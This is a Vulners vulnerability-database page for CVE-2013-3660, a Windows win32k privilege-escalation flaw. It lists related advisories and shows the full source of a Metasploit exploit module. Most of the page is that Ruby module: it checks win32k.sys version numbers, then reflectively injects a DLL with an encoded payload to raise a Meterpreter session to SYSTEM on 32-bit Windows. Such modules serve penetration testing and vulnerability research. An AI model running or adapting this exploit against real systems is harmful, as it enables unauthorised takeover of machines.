Vulners
Lucene search
Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
🗓️ 12 Sep 2013 19:36:01Reported by Tavis Ormandy <[email protected]>, progmboy <[email protected]>, Keebie4e, egypt <[email protected]>, sinn3r <[email protected]>, Ben Campbell <[email protected]>, juan vazquez <[email protected]>, OJ ReevesType 
metasploit🔗 www.rapid7.com👁 75 Views
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation | 2 Jul 201300:00 | – | zdt |
 | Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211) | 23 Feb 202219:48 | – | ibm |
 | CVE-2013-3660 | 24 May 201300:00 | – | attackerkb |
 | CVE-2013-3660 | 21 May 201300:00 | – | circl |
 | Microsoft Win32k Privilege Escalation Vulnerability | 28 Mar 202200:00 | – | cisa_kev |
 | CVE-2013-3660 | 24 May 201320:00 | – | cve |
 | CVE-2013-3660 | 24 May 201320:00 | – | cvelist |
 | Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit) | 2 Jul 201300:00 | – | exploitdb |
 | Advance Notification Service for July 2013 Security Bulletin Release | 4 Jul 201307:00 | – | msrc |
 | CVE-2013-3660 | 24 May 201320:55 | – | nvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
of uninitialized data which allows to corrupt memory. At the moment, the module has
been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' => [
'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
'progmboy <programmeboy[at]gmail.com>', # Original Exploit
'Keebie4e', # Metasploit integration
'egypt', # Metasploit integration
'sinn3r', # Metasploit integration
'Ben Campbell', # Metasploit integration
'juan vazquez', # Metasploit integration
'OJ Reeves' # Metasploit integration
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'WfsDelay' => 30
},
'Targets' => [
[ 'Automatic', {} ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
[ 'CVE', '2013-3660' ],
[ 'EDB', '25912' ],
[ 'OSVDB', '93539' ],
[ 'MSB', 'MS13-053' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2013/May/91' ],
],
'DisclosureDate' => '2013-05-15',
'DefaultTarget' => 0,
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_sys_config_getenv
]
}
}
}
)
)
end
def check
if session.platform == 'windows'
file_path = session.sys.config.getenv('windir') << '\\system32\\win32k.sys'
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
# WinXP x86 - 5.1.2600.6404
# WinXP/2003 5.2.3790.5174
# WinVista/2k8 - 6.0.6002.18861 / 6.0.6002.23132
# Win72k8R2 - 6.1.7601.18176 / 6.1.7601.22348
# Win8/2012 - 6.2.9200.16627 / 6.2.9200.20732
case build
when 2600
return Exploit::CheckCode::Appears if revision < 6404
when 3790
return Exploit::CheckCode::Appears if revision < 5174
when 6000
return Exploit::CheckCode::Appears
when 6001
return Exploit::CheckCode::Appears
when 6002
if branch == 18
return Exploit::CheckCode::Appears if revision < 18861
elsif revision < 23132
return Exploit::CheckCode::Appears
end
when 7600
return Exploit::CheckCode::Appears
when 7601
if branch == 18
return Exploit::CheckCode::Appears if revision < 18176
elsif revision < 22348
return Exploit::CheckCode::Appears
end
when 9200
if branch == 16
return Exploit::CheckCode::Appears if revision < 16627
elsif revision < 20732
return Exploit::CheckCode::Appears
end
end
end
return Exploit::CheckCode::Safe
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if sysinfo['Architecture'] == ARCH_X64
fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
end
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Reflectively injecting the DLL into a new process and triggering the LPE...')
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-3660', 'ppr_flatten_rec.x86.dll'),
encoded_payload
)
print_status("Exploit thread executing (can take a while to run), waiting #{datastore['WfsDelay']} sec ...")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2023 04:36Current
6.3Medium risk
Vulners AI Score6.3
CVSS 26.9
CVSS 3.17.8
EPSS0.39578